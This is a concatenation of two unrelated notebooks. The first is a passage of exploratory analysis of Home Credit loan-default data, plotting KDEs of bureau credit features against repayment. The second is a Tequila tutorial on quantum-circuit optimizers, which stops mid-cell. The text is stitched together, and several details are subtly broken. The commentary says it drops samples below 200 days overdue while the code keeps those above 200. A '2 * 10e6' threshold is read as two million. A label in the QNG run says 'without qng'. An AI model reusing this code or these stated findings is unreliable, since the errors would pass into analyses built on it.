ax[1][1].set_title('KDE for {} with log'.format(temp_col)) temp_col = col2 sns.kdeplot(application_train.loc[application_train['TARGET'] == 0, temp_col].dropna(), label='repay(0)', color='r', ax=ax[2][0]) sns.kdeplot(application_train.loc[application_train['TARGET'] == 1, temp_col].dropna(), label='not repay(1)', color='b', ax=ax[2][0]) ax[2][0].set_title('KDE for {}'.format(temp_col)) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[2][1]) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 1), 
temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[2][1])
    ax[2][1].set_title('KDE for {} with log'.format(temp_col))

col1 = 'OBS_60_CNT_SOCIAL_CIRCLE'
col2 = 'OBS_30_CNT_SOCIAL_CIRCLE'
multi_features_kde_plot(col1, col2)

- The multivariate KDE plot of not-repay is broader than that of repay.
- For both OBS_60_CNT_SOCIAL_CIRCLE and OBS_30_CNT_SOCIAL_CIRCLE, the distributions of repay and not-repay differ slightly. The log transform helps us to see this more easily.

col1 = 'NONLIVINGAREA_MEDI'
col2 = 'NONLIVINGAREA_MODE'
multi_features_kde_plot(col1, col2)

- This case is similar to the previous one.
- The multivariate KDE plot of not-repay is broader than that of repay.
- For both NONLIVINGAREA_MEDI and NONLIVINGAREA_MODE, the distributions of repay and not-repay differ slightly. The log transform helps us to see this more easily.

3. EDA - Bureau
- Bureau data contains information on clients' previous credits reported by other financial institutions.

3.1. Read and check data

# Read in bureau
bureau = pd.read_csv('../input/bureau.csv')
bureau.head()
msno.matrix(df=bureau, figsize=(10, 8), color=(0, 0.6, 1))
bureau.head()

3.2. Merge with application_train
- A client can have several previous loans, so merging the raw bureau table could explode the rows of application_train. Here we first aggregate bureau by SK_ID_CURR (mean) and then merge.

print('Application train shape before merge: ', application_train.shape)
application_train = application_train.merge(bureau.groupby('SK_ID_CURR').mean().reset_index(), left_on='SK_ID_CURR', right_on='SK_ID_CURR', how='left', validate='one_to_one')
print('Application train shape after merge: ', application_train.shape)
meta = make_meta_dataframe(application_train)

3.3. Analysis on object feature
3.3.1 Credit active

bureau.info()
temp_col = 'CREDIT_ACTIVE'
plot_count_percent_for_object(application_train, temp_col)

- Most previous credits are 'Closed' or 'Active'.
- If a credit ended in the state of bad debt, the not-repayment rate is relatively high (~20%).

3.3.2 Credit currency

temp_col = 'CREDIT_CURRENCY'
plot_count_percent_for_object(application_train, temp_col)

- 99.9% of clients chose currency 1.
- Nevertheless, the not-repayment rate is highest for currency 3.

3.3.3 Credit type

temp_col = 'CREDIT_TYPE'
plot_count_percent_for_object(application_train, temp_col)

- Clients with consumer credit are most numerous, followed by credit card.
- Loans for the purchase of equipment have a high not-repayment rate (23.5%), followed by microloans (20.6%).

3.4. Analysis on int feature
3.4.1 Credit day

temp_col = 'DAYS_CREDIT'
plt.figure(figsize=(10, 6))
sns.distplot(application_train.loc[(application_train['TARGET'] == 0), temp_col], bins=100, label='repay(0)', color='r')
sns.distplot(application_train.loc[(application_train['TARGET'] == 1), temp_col], bins=100, label='not repay(1)', color='b')
plt.title('Distplot for {} splitted by target'.format(temp_col))
plt.legend()
plt.show()

- There are two general (not strictly linear) trends we can see.
- The shorter the credit days, the more not-repayment.
- The larger the credit days, the more repayment.
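To put numbers behind these two trends, a minimal sketch (assuming the merged application_train above, which now contains DAYS_CREDIT and TARGET; the number of bins is arbitrary) groups the feature and reports the mean target per bin:

# Hypothetical sanity check: bin DAYS_CREDIT (days before the application, so values
# are negative) and compute the not-repayment rate and sample count per bin.
days_credit_bins = pd.cut(application_train['DAYS_CREDIT'], bins=10)
trend = application_train.groupby(days_credit_bins)['TARGET'].agg(['mean', 'size'])
trend.columns = ['not_repayment_rate', 'count']
print(trend)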
3.4.2 Credit day overduetemp_col = 'CREDIT_DAY_OVERDUE' fig, ax = plt.subplots(1, 2, figsize=(16, 6)) sns.kdeplot(application_train.loc[application_train['TARGET'] == 0, temp_col].dropna(), label='repay(0)', color='r', ax=ax[0]) sns.kdeplot(application_train.loc[application_train['TARGET'] == 1, temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0]) ax[0].set_title('KDE for {}'.format(temp_col)) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1]) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1]) ax[1].set_title('KDE for {} with log'.format(temp_col)) plt.show()- It is hard to see the trend for now. Let's remove the samples. (overdue < 200)temp_col = 'CREDIT_DAY_OVERDUE' fig, ax = plt.subplots(2, 2, figsize=(16, 16)) sns.kdeplot(application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[0][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0][0]) ax[0][0].set_title('KDE for {}'.format(temp_col)) application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 0), temp_col].dropna().hist(bins=100, ax=ax[0][1], normed=True, color='r', alpha=0.5) application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 1), temp_col].dropna().hist(bins=100, ax=ax[0][1], normed=True, color='b', alpha=0.5) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1][0]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1][0]) ax[1][0].set_title('KDE for {} with log'.format(temp_col)) np.log(application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001).hist(bins=100, ax=ax[1][1], normed=True, color='r', alpha=0.5) np.log(application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001).hist(bins=100, ax=ax[1][1], normed=True, color='b', alpha=0.5)- As you can see, repay have a litter more right-skewed distribution.- To see more deeply, Let's divide the overdue feature into several groups.def overdue(x): if x < 30: return 'A' elif x < 60: return 'B' elif x < 90: return 'C' elif x < 180: return 'D' elif x < 365: return 'E' else: return 'F' application_train['CREDIT_DAY_OVERDUE_cat'] = application_train['CREDIT_DAY_OVERDUE'].apply(overdue) meta = make_meta_dataframe(application_train) temp_col = 'CREDIT_DAY_OVERDUE_cat' plot_count_percent_for_object(application_train, temp_col)- The clients with short overdue days(<30) is most numerous.- B group has the highest not-repayment rate (19%), followed by C, D, E. 
A group is the lowest.temp_col = 'CREDIT_DAY_OVERDUE' fig, ax = plt.subplots(1, 2, figsize=(16, 6)) sns.kdeplot(application_train.loc[(application_train['TARGET'] == 0) & (application_train['CREDIT_DAY_OVERDUE'] > 30), temp_col].dropna(), label='repay(0)', color='r', ax=ax[0]) sns.kdeplot(application_train.loc[(application_train['TARGET'] == 1) & (application_train['CREDIT_DAY_OVERDUE'] > 30), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0]) ax[0].set_title('KDE for {} (>30)'.format(temp_col)) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 0) & (application_train['CREDIT_DAY_OVERDUE'] > 30), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1]) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 1) & (application_train['CREDIT_DAY_OVERDUE'] > 30), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1]) ax[1].set_title('KDE for {} with log (>30)'.format(temp_col)) plt.show()- KDE plot with samples which have overdue larger than 30 shows that the distribution of clients who repaid is larger than that of not-repay clients. 3.4.3 Credit day prolongtemp_col = 'CNT_CREDIT_PROLONG' fig, ax = plt.subplots(1, 2, figsize=(16, 8)) sns.kdeplot(application_train.loc[application_train['TARGET'] == 0, temp_col], label='repay(0)', color='r', ax=ax[0]) sns.kdeplot(application_train.loc[application_train['TARGET'] == 1, temp_col], label='not repay(1)', color='b', ax=ax[0]) plt.title('KDE for {} splitted by target'.format(temp_col)) sns.kdeplot(application_train.loc[(application_train['TARGET'] == 0) & (application_train[temp_col] > 3), temp_col], label='repay(0)', color='r', ax=ax[1]) sns.kdeplot(application_train.loc[(application_train['TARGET'] == 1) & (application_train[temp_col] > 3), temp_col], label='not repay(1)', color='b', ax=ax[1]) plt.title('KDE for {} splitted by target (>3)'.format(temp_col)) plt.show()- There are no clients who have prolong larger than 3. 3.5. 
Analysis on float feature 3.5.1 Amount credit sumtemp_col = 'AMT_CREDIT_SUM' fig, ax = plt.subplots(2, 2, figsize=(16, 16)) threshold = 2 * 10e6 sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[0][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0][0]) ax[0][0].set_title('KDE for {} (< {})'.format(temp_col, threshold)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[0][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[0][1]) ax[0][1].set_title('KDE for {} with log (< {})'.format(temp_col, threshold)) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[1][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[1][0]) ax[1][0].set_title('KDE for {} (> {})'.format(temp_col, threshold)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1][1]) ax[1][1].set_title('KDE for {} with log (> {})'.format(temp_col, threshold)) plt.show()- As you can see, if credit is lower than 2,000,000, the distribution of each repay and not-repay is similar.- But, if credit is larger than 2,000,000, the distribution of each repay and not-repay is different. Many clients who have very high(> 10,000,000) credit repaid. 
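The observation above can be checked numerically; a minimal sketch (same merged application_train and the same threshold expression as the plotting cell above) compares the not-repayment rate below and above the threshold:

# Hypothetical check of the AMT_CREDIT_SUM observation: compare TARGET means
# for clients with credit sum below and above the threshold used in the plots.
threshold = 2 * 10e6  # same expression as the plotting cell above
has_value = application_train['AMT_CREDIT_SUM'].notnull()
below = application_train.loc[has_value & (application_train['AMT_CREDIT_SUM'] < threshold), 'TARGET']
above = application_train.loc[has_value & (application_train['AMT_CREDIT_SUM'] >= threshold), 'TARGET']
print('not-repayment rate below threshold: {:.3f} ({} clients)'.format(below.mean(), len(below)))
print('not-repayment rate above threshold: {:.3f} ({} clients)'.format(above.mean(), len(above)))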
3.5.2 Amount credit sum debttemp_col = 'AMT_CREDIT_SUM_DEBT' fig, ax = plt.subplots(2, 2, figsize=(16, 16)) threshold = 2 * 10e6 sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[0][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0][0]) ax[0][0].set_title('KDE for {} (< {})'.format(temp_col, threshold)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[0][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[0][1]) ax[0][1].set_title('KDE for {} with log (< {})'.format(temp_col, threshold)) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[1][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[1][0]) ax[1][0].set_title('KDE for {} (> {})'.format(temp_col, threshold)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1][1]) ax[1][1].set_title('KDE for {} with log (> {})'.format(temp_col, threshold)) plt.show()- AMT_CREDIT_SUM_DEBT shows similar trend compared to AMT_CREDIT_SUM.- Many clients with high dept(> 50,000,000) repaid. 
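Sections 3.5.1 and 3.5.2 above, and 3.5.3 and 3.5.4 below, repeat the same below/above-threshold KDE layout. A small hypothetical helper, sketched here under the same column and target conventions as the rest of the notebook, could factor that pattern out:

def kde_by_threshold(df, col, threshold, eps=0.00001):
    # Sketch only: reproduces the repeated 2x2 layout -- rows = below/above threshold,
    # columns = raw/log scale, red = repay(0), blue = not repay(1).
    fig, ax = plt.subplots(2, 2, figsize=(16, 16))
    for i, (cond, sign) in enumerate([(df[col] < threshold, '<'), (df[col] > threshold, '>')]):
        for j, use_log in enumerate([False, True]):
            for target, label, color in [(0, 'repay(0)', 'r'), (1, 'not repay(1)', 'b')]:
                values = df.loc[cond & (df['TARGET'] == target), col].dropna()
                if use_log:
                    values = np.log(values + eps)
                sns.kdeplot(values, label=label, color=color, ax=ax[i][j])
            ax[i][j].set_title('KDE for {}{} ({} {})'.format(col, ' with log' if use_log else '', sign, threshold))
    plt.show()

# usage, mirroring section 3.5.2:
# kde_by_threshold(application_train, 'AMT_CREDIT_SUM_DEBT', 2 * 10e6)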
3.5.3 Amount credit sum limittemp_col = 'AMT_CREDIT_SUM_LIMIT' fig, ax = plt.subplots(3, 2, figsize=(16, 24)) threshold1 = 1e4 threshold2 = 1e6 sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold1) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[0][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold1) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0][0]) ax[0][0].set_title('KDE for {} (< {})'.format(temp_col, threshold1)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold1) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[0][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold1) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[0][1]) ax[0][1].set_title('KDE for {} with log (< {})'.format(temp_col, threshold1)) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[1][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[1][0]) ax[1][0].set_title('KDE for {} ({} < and < {})'.format(temp_col, threshold1, threshold2)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1][1]) ax[1][1].set_title('KDE for {} with log ({} < and < {})'.format(temp_col, threshold1, threshold2)) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold2) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[2][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold2) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[2][0]) ax[2][0].set_title('KDE for {} (> {})'.format(temp_col, threshold2)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold2) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[2][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold2) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[2][1]) ax[2][1].set_title('KDE for {} with log (> {})'.format(temp_col, threshold2)) plt.show()- In rough way, the repay clients have high CREDIT_SUM_LIMIT.- Is it possible to have minus credit sum limit?? 
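The question about negative credit sum limits can be answered directly from the data; a minimal sketch (same merged application_train as above):

# Hypothetical quick check: how many aggregated AMT_CREDIT_SUM_LIMIT values are negative?
limit = application_train['AMT_CREDIT_SUM_LIMIT']
print('negative values:', (limit < 0).sum(), 'out of', limit.notnull().sum(), 'non-null rows')
print(limit[limit < 0].describe())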
3.5.4 Amount credit sum overduetemp_col = 'AMT_CREDIT_SUM_OVERDUE' fig, ax = plt.subplots(3, 2, figsize=(16, 24)) threshold1 = 1e3 threshold2 = 1e5 sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold1) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[0][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold1) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0][0]) ax[0][0].set_title('KDE for {} (< {})'.format(temp_col, threshold1)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold1) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[0][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold1) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[0][1]) ax[0][1].set_title('KDE for {} with log (< {})'.format(temp_col, threshold1)) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[1][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[1][0]) ax[1][0].set_title('KDE for {} ({} < and < {})'.format(temp_col, threshold1, threshold2)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1][1]) ax[1][1].set_title('KDE for {} with log ({} < and < {})'.format(temp_col, threshold1, threshold2)) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold2) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[2][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold2) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[2][0]) ax[2][0].set_title('KDE for {} (> {})'.format(temp_col, threshold2)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold2) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[2][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold2) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[2][1]) ax[2][1].set_title('KDE for {} with log (> {})'.format(temp_col, threshold2)) plt.show()Tutorial: Optimization Hello, and welcome to our tutorial on optimization. Here, we will explore three of Tequila's built in optimizers. Chiefly, we will cover the gradient descent (GD) optimizer, we will also discuss the Phoenics and GPyOpt bayesian optimizers that can be accessed through Tequila. 1: The GD optimizer.### start at the start: import statements! 
import tequila as tq import numpy as np from tequila.optimizers.optimizer_gd import minimize as gd_minWe start by selecting an objective to optimize. We will begin with a fairly simple, 2-qubit expectationvalue. We will optimize our 2-qubit circuit with the simple, but non trivial hamiltonian $[Y(0)+Qm(0)]\otimes X(1)$, where $Qm=\frac{1}{2} (I + Z)$, the projector onto the 0 state.### optimizing the circuit in terms of pi makes the result of the optimization easier to interpret. a = tq.Variable(name="a")*tq.numpy.pi b = tq.Variable(name="b")*tq.numpy.pi c = tq.Variable(name="c")*tq.numpy.pi d = tq.Variable(name='d')*tq.numpy.pi U = tq.gates.H(target=[0]) U += tq.gates.H(target=1) U += tq.gates.Ry(target=0, angle=a) U += tq.gates.Rz(target=1, angle=b) U += tq.gates.Z(target=1,control=0) U += tq.gates.Rx(target=0, angle=c) U += tq.gates.Rx(target=1,angle=d) U += tq.gates.Z(target=1,control=0) ### once we have a circuit, we pick a hamiltonian to optimize over H=(tq.paulis.Y(0)+tq.paulis.Qm(0))*tq.paulis.X(1) O=tq.ExpectationValue(U=U,H=H) ### we use the .draw function to pretty-print circuits via backend printers. tq.draw(U,backend='qiskit') print(O)We are ready to optimize, now! like all tequila optimizers, the GD optimizer has a minimize function and most of the arguments are the same. However, there is one important difference: the GD optimizer takes a learning rate, lr. This parameter mediates step size in all of the GD optimizer methods; it is a positive float which scales the step in the direction of the gradient. There are several available optimization methods available to the GD optimizer, including basic SGD, SGD with momentum, and more advanced optimization strategies like Adam or RMS-prop.print('the following methods are available for Gradient Descent optimization:\n') print(tq.optimizers.optimizer_gd.OptimizerGD.available_methods())We will now optimize our chosen expectationvalue, chosing starting angles equivalent to $\frac{1}{4}\pi$ for all four variables, and optimizing via the ['Adam'](https://towardsdatascience.com/adam-latest-trends-in-deep-learning-optimization-6be9a291375c) method.init={'a':0.25,'b':0.25,'c':0.25,'d':0.25} lr=0.1 ### For even more fun, try using sampling with the samples keyword, ### or pick your favorite backend with the 'backend' keyword! result=gd_min(O,lr=lr, method='adam', maxiter=80, initial_values=init, silent=True)The plots below show the trajectory of both the value of the objective and the values of the angles as a function of time.result.history.plot('energies') result.history.plot('angles') print('best energy: ',result.energy) print('optimal angles: ',result.angles)We see that, minus a few hiccups, all the angles converge to optimimum values. Excercise: is this truly the best performance possible, or are we stuck in a local minimum? Let's repeat what we did above, but with a few of the other methods! Here's RMSprop:init={'a':0.25,'b':0.25,'c':0.25,'d':0.25} lr=0.01 result=gd_min(O,lr=lr, method='rmsprop', maxiter=80, initial_values=init, silent=True) print('RMSprop optimization results:') result.history.plot('energies') result.history.plot('angles') print('best energy: ',result.energy) print('optimal angles: ',result.angles)... 
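Before trying the other methods, it may help to spell out what "lr scales the step in the direction of the gradient" means. The block below is a plain numpy sketch of the textbook SGD and momentum update rules, for illustration only, not Tequila's internal implementation:

import numpy as np

def sgd_step(theta, grad, lr):
    # vanilla gradient descent: move against the gradient, scaled by lr
    return theta - lr * grad

def momentum_step(theta, grad, velocity, lr, beta=0.9):
    # momentum: accumulate an exponentially decaying average of past gradients
    velocity = beta * velocity + lr * grad
    return theta - velocity, velocity

theta = np.array([0.25, 0.25, 0.25, 0.25])  # e.g. the four angles a, b, c, d
grad = np.array([0.10, -0.30, 0.05, 0.20])  # made-up gradient, purely for illustration
print('one SGD step with lr=0.1 :', sgd_step(theta, grad, lr=0.1))
print('one SGD step with lr=0.01:', sgd_step(theta, grad, lr=0.01))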
And here's Momentum:init={'a':0.25,'b':0.25,'c':0.25,'d':0.25} lr=0.1 result=gd_min(O,lr=lr, method='momentum', maxiter=80, initial_values=init, silent=True) print('momentum optimization results:') result.history.plot('energies') result.history.plot('angles') print('best energy: ',result.energy) print('optimal angles: ',result.angles)Note that when using the [RMSprop](https://towardsdatascience.com/understanding-rmsprop-faster-neural-network-learning-62e116fcf29a) method, we reduced the learning rate from 0.1 to 0.01. Different methods may be more or less sensitive to choices of initial learning rate. Try going back to the previous examples, and choosing different learning rates, or different initial parameters, to gain a feel for how sensitive different methods are. 1.1: The GD optimizer, with the Quantum Natural Gradient. The Quantum Natural Gradient, or QNG, is a novel method of calculating gradients for quantum systems, inspired by the natural gradient sometimes employed in classical machine learning. The usual gradient we employ is with respect to a euclidean manifold, but this is not the only geometry -- nor even, the optimal geometry -- of quantum space. The QNG is, in essence, a method of taking gradients with respect to (an approximation to) the Fubini-Study metric. For information on how (and why) the QNG is used, see [Stokes et.al](https://arxiv.org/abs/1909.02108). Using the qng in Tequila is as simple as passing in the keyword qng=True to optimizers which support it, such as the GD optimizer. We will use it to optimize a more complicated circuit below, and then compare the results to optimizing the same circuit with the regular gradient.### this time, don't scale by pi H = tq.paulis.Y(0)*tq.paulis.X(1)*tq.paulis.Y(2) U = tq.gates.Ry(tq.numpy.pi/2,0) +tq.gates.Ry(tq.numpy.pi/3,1)+tq.gates.Ry(tq.numpy.pi/4,2) U += tq.gates.Rz('a',0)+tq.gates.Rz('b',1) U += tq.gates.CNOT(control=0,target=1)+tq.gates.CNOT(control=1,target=2) U += tq.gates.Ry('c',1) +tq.gates.Rx('d',2) U += tq.gates.CNOT(control=0,target=1)+tq.gates.CNOT(control=1,target=2) E = tq.ExpectationValue(H=H, U=U) print('drawing a more complicated circuit. Hope you like it!') tq.draw(U) ### the keyword stop_count, below, stops optimization if no improvement occurs after 50 epochs. ### let's use a random initial starting point: init={k:np.random.uniform(-2,2) for k in ['a','b','c','d']} lr=0.01 result = tq.minimize(objective=E, qng=True, method='sgd', maxiter=200,lr=lr,stop_count=50, initial_values=init, silent=True) result.history.plot('energies') result.history.plot('angles') print('best energy with qng: ',result.energy) print('optimal angles without qng: ',result.angles)To gain appreciation for why one might use the QNG, let's optimize the same circuit with the same learning rate and the same method, but without QNG.lr=0.01 result = tq.minimize(objective=E, qng=False, method='sgd', maxiter=200,lr=lr,stop_count=50, initial_values=init, silent=True) print('plotting what happens without QNG') result.history.plot('energies') result.history.plot('angles') print('best energy without qng: ',result.energy) print('optimal angles without qng: ',result.angles)Though the starting point was random (and so I, your humble tutorial writer, do not know what your graphs look like), you will most likely see that the QNG run achieved a greater degree of improvement, and that the trajectories followed by angles there was different from that followed by angles in the straight-gd optimization. 
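Since the two runs above differ only in the qng flag, one convenient pattern is to loop over both settings with identical hyperparameters and compare the final energies. This is just a convenience sketch built from the calls already shown above:

# Sketch: rerun the comparison with identical settings, toggling only the qng flag.
energies = {}
for use_qng in (True, False):
    res = tq.minimize(objective=E, qng=use_qng, method='sgd', maxiter=200,
                      lr=0.01, stop_count=50, initial_values=init, silent=True)
    energies[use_qng] = res.energy
    print('qng={}: best energy {:.6f}'.format(use_qng, res.energy))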
Feel free to play around with other methods, learning rates, or circuits in the space below!### have fun!2. Bayesian Optimization [Bayesian optimization](https://arxiv.org/abs/1807.02811) is a method of global optimization, often used to tune hyperparameters in classical learning. It has also seen use in the optimization of [quantum circuits](https://arxiv.org/pdf/1812.08862.pdf). Tequila currently supports 2 different bayesian optimization algorithms: [Phoenics](https://github.com/aspuru-guzik-group/phoenics) and [GPyOpt](https://github.com/SheffieldML/GPyOpt), optimizers originally developed for optimizing expensive experimental procedures in chemistry. Click the links to get to the respective github pages, and download the optimizers before continuing this tutorial. 2.1: GPyOpt GPyOpt can be used like any of our other optimizers. Like the GD and SciPy optimizers, it also takes a 'method' keyword. 3 methods are supported: 'lbfgs','DIRECT', and 'CMA'. See the GPyOpt github for more info.from tequila.optimizers.optimizer_gpyopt import minimize as gpy_minwe will use GPyOpt to optimize the same circuits as seen above.### optimizing the circuit in terms of pi makes the result of the optimization easier to interpret. a = tq.Variable(name="a")*tq.numpy.pi b = tq.Variable(name="b")*tq.numpy.pi c = tq.Variable(name="c")*tq.numpy.pi d = tq.Variable(name='d')*tq.numpy.pi U = tq.gates.H(target=[0]) U += tq.gates.H(target=1) U += tq.gates.Ry(target=0, angle=a) U += tq.gates.Rz(target=1, angle=b) U += tq.gates.Z(target=1,control=0) U += tq.gates.Rx(target=0, angle=c) U += tq.gates.Rx(target=1,angle=d) U += tq.gates.Z(target=1,control=0) ### once we have a circuit, we pick a hamiltonian to optimize over H=(tq.paulis.Y(0)+tq.paulis.Qm(0))*tq.paulis.X(1) O=tq.ExpectationValue(U=U,H=H) ### we use the .draw function to pretty-print circuits via backend printers. tq.draw(U,backend='qiskit') print(O) ### let's use the lbfgs method. init={'a':0.25,'b':0.25,'c':0.25,'d':0.25} ### note: no lr is passed here! there are fewer tunable keywords for this optimizer. result=gpy_min(O, method='lbfgs', maxiter=80, initial_values=init) print('GPyOpt optimization results:') result.history.plot('energies') result.history.plot('angles') print('best energy: ',result.energy) print('optimal angles: ',result.angles)Perhaps you are looking at the plots above in horror. But, do take note: bayesian optimization is a global, exploratory optimization method, designed to explore large portions of parameter space while still seeking out optimality. Look at the optimal energy again, and one sees that the best performance of this optimization method matched that of all the gradient descent methods. We will apply gpyopt, next, to the QNG example circuit above, and see how bayesian optimization compares to QNG and SGD.### this time, don't scale by pi H 